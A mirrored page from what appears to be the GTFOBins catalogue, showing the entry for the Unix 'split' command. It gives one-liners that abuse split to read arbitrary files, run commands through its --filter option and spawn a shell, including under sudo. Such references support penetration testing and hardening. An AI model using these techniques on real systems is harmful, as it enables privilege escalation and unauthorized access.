This website requires JavaScript.
Explore
Help
Register
Sign In
mirror
/
GTFOBins.github.io
Watch
1
Star
0
Fork
0
You've already forked GTFOBins.github.io
mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced
2026-01-10 09:21:34 +01:00
Code
Issues
7e1ac22fa0
GTFOBins.github.io
/
_gtfobins
/
split.md
Andrea Cardaci
fbe4b42890
Improve split
2020-12-20 21:15:58 +01:00
705 B
Raw
Blame
History
functions
file-read
command
shell
sudo
code
LFILE=file_to_read TF=$(mktemp) split $LFILE $TF cat $TF*
description
code
Command execution using an existing or newly created file.
COMMAND=id TF=$(mktemp) split --filter=$COMMAND $TF
description
code
Command execution using stdin (and close it directly).
COMMAND=id echo | split --filter=$COMMAND /dev/stdin
description
code
The shell prompt is not printed.
split --filter=/bin/sh /dev/stdin
description
code
The shell prompt is not printed.
split --filter=/bin/sh /dev/stdin